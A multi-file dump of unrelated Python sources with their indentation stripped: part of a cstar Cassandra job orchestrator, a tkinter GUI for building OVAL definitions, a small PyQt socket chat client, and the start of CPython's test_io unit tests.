pickle.dump(dict(endpoint_mappings), open(self.get_cache_file_path("endpoint_mapping"), 'wb'))
return endpoint_mappings
def run_nodetool(self, conn, *cmds):
if self.jmx_username and self.jmx_password:
return conn.run(("nodetool", "-u", self.jmx_username, "-pw", self.jmx_password, *cmds))
elif self.jmx_username and self.jmx_passwordfile:
return conn.run(("nodetool", "-u", self.jmx_username, "-pwf", self.jmx_passwordfile, *cmds))
else:
return conn.run(("nodetool", *cmds))
def setup(self, hosts, seeds, command, job_id, strategy, cluster_parallel, dc_parallel, job_runner,
max_concurrency, timeout, env, stop_after, key_space, output_directory,
ignore_down_nodes, dc_filter,
sleep_on_new_runner, sleep_after_done,
ssh_username, ssh_password, ssh_identity_file, ssh_lib,
jmx_username, jmx_password, jmx_passwordfile, resolve_hostnames, hosts_variables):
msg("Starting setup")
msg("Strategy:", cstar.strategy.serialize(strategy))
msg("Cluster parallel:", cluster_parallel)
msg("DC parallel:", dc_parallel)
self.command = command
self.job_id = job_id
self.timeout = timeout
self.env = env
self.job_runner = job_runner
self.key_space = key_space
self.output_directory = output_directory or os.path.expanduser("~/.cstar/jobs/" + job_id)
self.cache_directory = os.path.expanduser("~/.cstar/cache")
self.sleep_on_new_runner = sleep_on_new_runner
self.sleep_after_done = sleep_after_done
self.ssh_username = ssh_username
self.ssh_password = ssh_password
self.ssh_identity_file = ssh_identity_file
self.ssh_lib = ssh_lib
self.jmx_username = jmx_username
self.jmx_password = jmx_password
self.jmx_passwordfile = jmx_passwordfile
self.resolve_hostnames = resolve_hostnames
self.hosts_variables = hosts_variables
if not os.path.exists(self.output_directory):
os.makedirs(self.output_directory)
if not os.path.exists(self.cache_directory):
os.makedirs(self.cache_directory)
msg("Loading cluster topology")
if seeds:
current_topology = cstar.topology.Topology([])
current_topology = current_topology | self.get_cluster_topology(seeds)
original_topology = current_topology
if dc_filter:
original_topology = original_topology.with_dc_filter(dc_filter)
else:
current_topology = cstar.topology.Topology()
hosts_ip_set = set(socket.gethostbyname(host) for host in hosts)
for raw_host in hosts:
host = socket.gethostbyname(raw_host)
if host in current_topology:
continue
current_topology = current_topology | self.get_cluster_topology((host,))
original_topology = cstar.topology.Topology(host for host in current_topology if host.ip in hosts_ip_set)
msg("Done loading cluster topology")
debug("Run on hosts", original_topology)
debug("in topology", current_topology)
msg("Generating endpoint mapping")
if strategy is cstar.strategy.Strategy.TOPOLOGY:
endpoint_mapping = self.get_endpoint_mapping(current_topology)
msg("Done generating endpoint mapping")
else:
endpoint_mapping = None
msg("Skipping endpoint mapping because of selected strategy")
self.state = cstar.state.State(original_topology, strategy, endpoint_mapping,
cluster_parallel, dc_parallel, dc_filter=dc_filter,
max_concurrency=max_concurrency, current_topology=current_topology,
stop_after=stop_after, ignore_down_nodes=ignore_down_nodes)
msg("Setup done")
def update_current_topology(self, skip_nodes=()):
new_topology = cstar.topology.Topology()
for cluster in self.state.original_topology.get_clusters():
seeds = self.state.get_idle().with_cluster(cluster).without_hosts(skip_nodes).get_up()
# When using the all strategy, all nodes go to running, so we need to pick some node
seeds = seeds or self.state.current_topology.with_cluster(cluster).get_up()
new_topology = new_topology | self.get_cluster_topology(seeds)
self.state = self.state.with_topology(new_topology)
def wait_for_node_to_return(self, nodes=()):
"""Wait until node returns"""
while True:
try:
self.update_current_topology(nodes)
if self.state.is_healthy():
break
except BadSSHHost as e:
# If the instance used to poll cluster health is down it probably means that machine is rebooting
# State is then NOT healthy, so continue waiting...
debug("SSH to %s failed, instance down?" % (node, ), e)
cstar.jobprinter.print_progress(self.state.original_topology,
self.state.progress,
self.state.current_topology.get_down())
time.sleep(5)
def resume(self):
self.update_current_topology()
self.resume_on_running_hosts()
self.run()
def run(self):
self.do_loop = True
cstar.jobwriter.write(self)
if not self.state.is_healthy():
raise HostIsDown(
"Can't run job because hosts are down: " + ", ".join(
host.fqdn for host in self.state.current_topology.get_down()))
while self.do_loop:
self.schedule_all_runnable_jobs()
if self.state.is_done():
self.do_loop = False
self.wait_for_any_job()
self.wait_for_all_jobs()
cstar.jobprinter.print_progress(self.state.original_topology,
self.state.progress,
self.state.current_topology.get_down())
self.print_outcome()
def resume_on_running_hosts(self):
for host in self.state.progress.running:
debug("Resume on host", host.fqdn)
threading.Thread(target=self.job_runner(self, host, self.ssh_username, self.ssh_password, self.ssh_identity_file, self.ssh_lib, self.hosts_variables),
name="cstar %s" % host.fqdn).start()
time.sleep(self.sleep_on_new_runner)
def print_outcome(self):
if self.state.is_done() and not self.errors:
if len(self.state.progress.done) == self.state.stop_after:
cstar.jobwriter.write(self)
msg("Job", self.job_id, "successfully ran on", self.state.stop_after, "hosts.\nTo finish the job, run",
emph("cstar continue %s" % (self.job_id,)))
msg("Job", self.job_id, "finished successfully")
else:
msg("Job", self.job_id, "finished with errors.\n"
"%s nodes finished successfully\n"
"%s nodes had errors\n"
"%s nodes didn't start executing"
% (len(self.state.progress.done),
len(self.state.progress.failed),
len(self.state.original_topology) - len(self.state.progress.done) - len(self.state.progress.failed)))
def wait_for_all_jobs(self):
while self.state.progress.running:
host, result = self.results.get()
self.returned_jobs.append((host, result))
if self.results.empty():
self.handle_finished_jobs(self.returned_jobs)
self.returned_jobs = list()
def wait_for_any_job(self):
if self.do_loop:
host, result = self.results.get(timeout=self.timeout)
self.returned_jobs.append((host, result))
while not self.results.empty():
host, result = self.results.get(timeout=self.timeout)
self.returned_jobs.append((host, result))
self.handle_finished_jobs(self.returned_jobs)
self.wait_for_node_to_return(returned_job[0] for returned_job in self.returned_jobs)
self.returned_jobs = list()
def handle_finished_jobs(self, finished_jobs):
debug("Processing ", len(finished_jobs), " finished jobs")
for finished_job in finished_jobs:
host = finished_job[0]
result = finished_job[1]
if result.status != 0:
self.errors.append((host, result))
self.state = self.state.with_failed(host)
msg("Failure on host", host.fqdn)
if result.out:
msg("stdout:", result.out)
if result.err:
msg("stderr:", result.err)
self.do_loop = False
else:
self.state = self.state.with_done(host)
info("Host %s finished successfully" % (host.fqdn,))
if result.out:
info("stdout:", result.out, sep="\n")
if result.err:
info("stderr:", result.err)
if self.sleep_after_done:
debug("Sleeping %d seconds..." % self.sleep_after_done)
time.sleep(self.sleep_after_done)
cstar.jobwriter.write(self)
# Signal the jobrunner that it can delete the remote job files and terminate.
for finished_job in finished_jobs:
host, result = finished_job
self.handled_finished_jobs.add(host)
def schedule_all_runnable_jobs(self):
while True:
next_host = self.state.find_next_host()
if not next_host:
if not self.state.progress.running:
self.do_loop = False
break
if (not next_host.is_up) and self.state.ignore_down_nodes:
self.state = self.state.with_done(next_host)
else:
self.state = self.state.with_running(next_host)
self.schedule_job(next_host)
cstar.jobwriter.write(self)
cstar.jobprinter.print_progress(self.state.original_topology,
self.state.progress,
self.state.current_topology.get_down())
def schedule_job(self, host):
debug("Running on host", host.fqdn)
threading.Thread(target=self.job_runner(self, host, self.ssh_username, self.ssh_password, self.ssh_identity_file, self.ssh_lib, self.get_host_variables(host)),
name="cstar %s" % host.fqdn).start()
time.sleep(self.sleep_on_new_runner)
def _connection(self, host):
if host not in self._connections:
self._connections[host] = cstar.remote.Remote(host, self.ssh_username, self.ssh_password, self.ssh_identity_file, self.ssh_lib, self.get_host_variables(host))
return self._connections[host]
def close(self):
for name, conn in self._connections.items():
if conn:
conn.close()
self._connections = {}
def get_host_variables(self, host):
hostname = host
if type(host).__name__ == "Host":
hostname = host.fqdn
host_variables = dict()
if hostname in self.hosts_variables.keys():
host_variables = self.hosts_variables[hostname]
debug("Variables for host {} = {}".format(hostname, host_variables))
return host_variables
|
gui.py
|
import os
import re
import sys
import tkinter as tk
import tkinter.ttk as ttk
import modules.list_repository
import modules.build_definition
from threading import Thread
class BuildFrameObject:
build_frame = None
list_frame_object = None
operational_frame_object = None
class OperationalFrameObject:
# parent object
build_frame_object = None
# self frame
operational_frame = None
# child frames
console_frame = None
control_frame = None
# widgets
console = None
console_scrollbar=None
build_button=None
name_label=None
# processing thread
thread = None
def __init__(self, build_frame_object, build_frame):
self.build_frame_object=build_frame_object
self.operational_frame=tk.Frame(build_frame)
# Methods for console init
def initConsoleFrame(self):
self.console_frame=tk.Frame(self.operational_frame)
def initConsole(self):
self.console=tk.Text(self.console_frame, wrap=tk.WORD, width=45, font=("Courier", 9))
self.console_scrollbar=ttk.Scrollbar(master=self.console_frame, orient='vertical', command=self.console.yview)
self.console.configure(yscrollcommand=self.console_scrollbar.set)
# Methods for controls init
def initControlsFrame(self):
self.control_frame = tk.Frame(self.operational_frame)
def initControls(self):
self.name_label = tk.Label(self.control_frame, text=' OVAL Repository Management ')
self.build_button = tk.Button(self.control_frame, text='Build OVAL definitions')
self.build_button.bind('<1>',self.onBuildButtonClick)
def onBuildButtonClick(self, args):
"""Event listener for Build button
This listener only starts new thread so GUI will not be freezed.
The thread won't be started if button is disabled, which means
that building is working now.
"""
if self.build_button['state']=='disabled':
return
Thread(target=self.buildButtonWorker).start()
def buildButtonWorker(self):
"""Actual button action
This method will disable button until end and start building
chosen OVAL definitions.
"""
# disable button to prevent lot of threading
self.build_button.configure(state='disabled')
self.build_button.update()
text = self.console
tree = self.build_frame_object.list_frame_object.tree
items = tree.selection()
text.delete(1.0,tk.END)
names = [ ]
build_query=''
for i in items:
it = tree.item(i)
if it['text']=='definitions':
try:
names.append(it['values'][0])
query = it['values'][1]
def_id = query.split('\\')[-1]
build_query+=def_id+', '
except IndexError as e:
print('IndexError: '+str(e))
pass
if build_query:
text.insert(1.0,'Building definitions (schema version 5.11.1):\n')
if len(names)<50:
for n in names:
text.insert(2.0, '*'+n+'\n')
else:
length = str(len(names))
text.insert(2.0, f'Too much definitions to write names. Building {length} definitions.')
# cut off the last comma
build_query = re.search('(.*)(, $)', build_query).group(1)
query = f'b --definition_id {build_query} --max_schema_version 5.11.1 -o out.xml'
sys.argv = query.split(' ')
modules.build_definition.build_definition()
text.insert(tk.END, '\n\nBuilding done. File: out.xml')
else:
text.insert(tk.END,'No definitions choosed! Nothing to build.\n')
self.build_button.configure(state='active')
self.build_button.update()
class ListFrameObject:
# parent object
build_frame_object = None
# self frame
list_frame = None
# widgets
tree = None
scrollbar=None
def __init__(self, build_frame_object, build_frame):
# Pointer to outer frame and itself
self.build_frame_object=build_frame_object
self.list_frame=tk.Frame(build_frame)
# init tree and scrollbar
self.tree = ttk.Treeview(self.list_frame)
self.scrollbar = ttk.Scrollbar(self.list_frame, orient='vertical', command=self.tree.yview)
self.tree.configure(yscrollcommand=self.scrollbar.set)
# create columns
self.tree['columns']=('Title', 'Path')
self.tree.heading('#0', text='OVAL Class', anchor=tk.W)
self.tree.heading('#1', text = 'Title', anchor=tk.W)
self.tree.heading('#2', text = 'Path to file', anchor=tk.W)
self.tree.column('#0', minwidth=3, width=10)
self.tree.column('#1', minwidth=3, width=80)
self.tree.column('#2', minwidth=3, width=10)
self.tree.bind('<1>', self.onTreeClick)
def getRepoContent(self):
repo = modules.list_repository.get_repository_dir(os.path.relpath('./ScriptsEnvironment/repository/definitions'))
for oval_type in repo:
length =str(len(repo[oval_type]))
header = oval_type+' ['+length+']'
ent_folder = self.tree.insert('', tk.END, text=header, values=())
if oval_type=='definitions':
for id in repo[oval_type]:
self.tree.insert(ent_folder, tk.END, text=oval_type, values=(repo[oval_type][id], id))
#else:
# for entity in repo[oval_type]:
# self.tree.insert(ent_folder,tk.END, text=oval_type, values=(entity.replace('\\','\\\\')))
def onTreeClick(self, args):
item = self.tree.selection()[0]
print(self.tree.item(item))
def initListFrame(self):
self.list_frame_object = self.ListFrameObject(self, self.build_frame)
self.list_frame_object.getRepoContent()
def initOperationalFrame(self):
self.operational_frame_object=self.OperationalFrameObject(self, self.build_frame)
self.operational_frame_object.initConsoleFrame()
self.operational_frame_object.initConsole()
self.operational_frame_object.initControlsFrame()
self.operational_frame_object.initControls()
def packBuildFrame(self):
# packing oval list
self.list_frame_object.list_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
self.list_frame_object.tree.pack(side=tk.LEFT,fill=tk.BOTH, expand=True)
self.list_frame_object.scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
# packing cotrol frame
self.operational_frame_object.operational_frame.pack(side=tk.RIGHT, fill=tk.BOTH)
# and it's childs
self.operational_frame_object.control_frame.pack(side=tk.TOP, fill=tk.BOTH)
self.operational_frame_object.name_label.pack(side=tk.TOP)
self.operational_frame_object.build_button.pack(side=tk.TOP)
self.operational_frame_object.console_frame.pack(side=tk.BOTTOM, fill=tk.BOTH)
self.operational_frame_object.console.pack(side=tk.LEFT,fill=tk.BOTH, expand=True)
self.operational_frame_object.console_scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
def runBuildFrame(self):
self.build_frame.mainloop()
def __init__(self, root):
self.build_frame = root
def main():
root = tk.Tk()
root.geometry('1280x480')
root.title('OVAL Repository Management')
build_frame = BuildFrameObject(root)
build_frame.initListFrame()
build_frame.initOperationalFrame()
build_frame.packBuildFrame()
build_frame.runBuildFrame()
if __name__ == '__main__':
main()
|
Client.py
|
import socket
import threading
from PyQt5.QtWidgets import QMainWindow,QApplication
import client_ui
import sys
class Client:
def __init__(self, host, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock = sock
self.sock.connect((host, port))
self.sock.send(b'1')
def sendThreadFunc(self):
while True:
try:
word = self.sock.recv(1024) # socket.recv(recv_size)
print(word.decode())
except ConnectionAbortedError:
print('Server closed this connection!')
except ConnectionResetError:
print('Server is closed!')
def recvThreadFunc(self):
while True:
try:
otherword = self.sock.recv(1024) # socket.recv(recv_size)
print(otherword.decode())
except ConnectionAbortedError:
print('Server closed this connection!')
except ConnectionResetError:
print('Server is closed!')
class Main(QMainWindow,client_ui.Ui_MainWindow,Client):
def __init__(self):
super(self.__class__,self).__init__()
self.setupUi(self)
self.pushButton_2.setText("Send")
self.pushButton_2.clicked.connect(self.login)
self.pushButton.clicked.connect(self.send)
def login(self):
text="Welcome to chat room !" + self.textEdit.toPlainText() + "\nNow let\'s chat !" + self.textEdit.toPlainText()
self.textBrowser.append(text)
self.textBrowser.update()
self.lineEdit.setText("")
self.pushButton_2.setDisabled(True)
self.textEdit.setDisabled(True)
self.pushButton.setDisabled(False)
self.nickname=self.textEdit.toPlainText()
#self.sock.send(self.nickname.encode())
def send(self):
#self.sock.send(self.lineEdit.text().encode(()))
mes = " \n " + self.lineEdit.text() + ": You"
self.textBrowser.append(mes)
self.textBrowser.update()
def main():
app=QApplication(sys.argv)
MainWindow=Main()
MainWindow.show()
sys.exit(app.exec_())
c = Client('140.138.145.58', 5550)
th1 = threading.Thread(target=c.sendThreadFunc)
th2 = threading.Thread(target=c.recvThreadFunc)
threads = [th1, th2]
for t in threads:
t.setDaemon(True)
t.start()
t.join()
if __name__ == "__main__":
main()
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import sysconfig
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, run_python_until_end
from test.support.os_helper import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
_cflags = sysconfig.get_config_var('CFLAGS') or ''
_config_args = sysconfig.get_config_var('CONFIG_ARGS') or ''
MEMORY_SANITIZER = (
'-fsanitize=memory' in _cflags or
'--with-memory-sanitizer' in _config_args
)
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence=0):
# naive implementation, enough for tests
return 0
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
os_helper.unlink(os_helper.TESTFN)
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(os_helper.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(os_helper.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(os_helper.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(os_helper.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(os_helper.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(os_helper.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(os_helper.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(os_helper.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(os_helper.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 100):
f = None
with self.open(os_helper.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(os_helper.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
